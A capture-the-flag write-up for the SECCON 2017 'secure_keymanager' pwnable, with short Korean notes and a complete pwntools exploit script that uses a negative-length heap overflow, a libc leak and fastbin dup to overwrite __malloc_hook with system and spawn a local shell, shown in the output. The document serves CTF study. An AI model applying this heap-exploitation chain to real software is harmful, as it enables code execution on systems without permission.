CTF/2018

SECCON 2017 QUAL - secure_keymanager

pwn3r_45 2018. 8. 22. 21:35

Category : pwnable


secure_keymanager-f9d02e8a1149ff866cad10f001e8f23803bcac3c42ed7ffdcbe50da40e8afd12.zip


Summary : simple heap overflow, fastbin dup into stack



그냥 fastbin문제. 헬게이트 문제로 기억했는데 다른거였나봄.. 하지만 이상한 삽질하다가 시간 더 걸린거 반성하기.

malloc_hook에서 원가젯 바로 못 쓰면 다른 hook 연동해서 간단하게 rsp 컨트롤하기.

malloc 인자 뭐들어가는지 제대로 기억하기.




ex.py

#!/usr/bin/python

from pwn import *

def cmd_add(key_len, title, key):
    """Drive menu option 1 (add a key) through the module-level ru/ss aliases.

    Each prompt is awaited and answered in order. The key itself is only
    sent for a non-negative key_len; the listing's indentation was lost on
    the page, so only the final send is treated as conditional here, which
    is the reading consistent with the calls made further down.
    """
    dialogue = (
        ('>> ', '1'),
        ('Input key length...', str(key_len)),
        ('Input title...', title),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        ss(answer)
    ru('Input key...')
    if key_len < 0:
        # negative length: the script presumably expects no key read here
        return
    ss(key)

def cmd_edit(idx, new_key, _account=None, _master=None):
    """Drive menu option 3 (edit a key).

    When _account is truthy only the account-name step runs: the text the
    program prints between the quotes after "Account '" is returned (the
    closing quote included, as recvuntil keeps its delimiter) and the rest
    of that line is consumed. Otherwise the module globals account/master
    are sent and the key with id idx is replaced by new_key.
    _master is accepted for symmetry with cmd_remove but is never used.
    """
    ru('>> ')
    ss('3')
    ru('EDIT KEY\n')
    ru('Input Account Name >> ')
    if _account:
        ss(_account)
        ru('Account \'')
        echoed = ru('\'')
        rl()
        return echoed
    ss(account)
    tail = (
        ('Input Master Pass >> ', master),
        ('Input id to edit...', str(idx)),
        ('Input new key...', new_key),
    )
    for prompt, answer in tail:
        ru(prompt)
        ss(answer)

def cmd_remove(idx, _account=None, _master=None):
    """Drive menu option 4 (remove a key).

    Mirrors cmd_edit: with a truthy _account the function stops after the
    account-name step and returns what the program echoes between the
    quotes (closing quote included); otherwise the module globals
    account/master are sent and the key with id idx is removed.
    _master is unused.
    """
    ru('>> ')
    ss('4')
    ru('REMOVE KEY\n')
    ru('Input Account Name >> ')
    if _account:
        ss(_account)
        ru('Account \'')
        echoed = ru('\'')
        rl()
        return echoed
    ss(account)
    tail = (
        ('Input Master Pass >> ', master),
        ('Input id to remove...', str(idx)),
    )
    for prompt, answer in tail:
        ru(prompt)
        ss(answer)

# Credentials the program asks for at startup; both are sent NUL-terminated
# below. master is also the "/bin/sh" string whose address is hard-coded
# further down (0x602130), which only works if the binary is loaded at a
# fixed address (non-PIE) -- confirm against the challenge binary.
account = 'pwn3r'
master = '/bin/sh'


# Local run only: the binary is spawned from the working directory and driven
# through pwntools. ru/rl/sl/ss are the short aliases the cmd_* helpers use.
s = process('./secure_keymanager')
ru = s.recvuntil
rl = s.recvline
sl = s.sendline  # defined for convenience; not used in this script
ss = s.send

ss(account+'\x00')
ss(master+'\x00')

# Three keys. The first uses a negative length, so cmd_add never sends a key
# for it; per the writeup summary this is where the heap overflow comes from,
# i.e. the program apparently does not reject a negative key length (inferred).
cmd_add(-16, 'chunk1', '')
cmd_add(16, 'chunk2', 'data')
cmd_add(0x68 - 32, 'chunk3', 'data')
# Leak: an over-long account name is echoed back; the bytes after the 0x18
# filler (trailing quote dropped) are read as a libc pointer. The subtraction
# and the two offsets below are specific to the libc this writeup ran against.
libc_base = u64(cmd_edit(0, '', _account='a'*0x18)[0x18:-1].ljust(8, '\x00')) - 0x7a81b
libc_malloc_hook = libc_base + 0x3c4b10
libc_system = libc_base + 0x45390
master_addr = 0x602130 # "/bin/sh\x00"
print hex(libc_base)  # Python 2 print statement; the whole script is Python 2
cmd_remove(0) # free chunk1
cmd_remove(2) # free chunk3
cmd_add(-16, 'a'*0x18+p64(0xb1)[:-1], '') # overwrite chunk2 size
cmd_edit(1, 'a'*0x10+p64(0)+p64(0x71)+p64(libc_malloc_hook - 0x23)) # overwrite chunk3 fd
cmd_add(0x68 - 32, 'chunk3 again', 'data') # chunk3 again

payload = 'a'*(0x23-0x10) + p64(libc_system)
cmd_add(0x68 - 32, payload, '\x00') # *libc_malloc_hook = libc_system
# Final add is deliberately left half-done: only the menu choice and the
# length prompt are answered. The length is derived from master_addr with the
# same -32 seen in the sizes above (the program's own adjustment, inferred
# from those calls rather than shown here).
ru('>> ')
ss('1')
ru('Input key length...')
ss(str(master_addr - 32))

# Hand the session to the user, then close the process on exit.
s.interactive()
s.close()



Exploit

$ python ex.py
[+] Starting local process './secure_keymanager': pid 25650
0x7febf6a9d000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)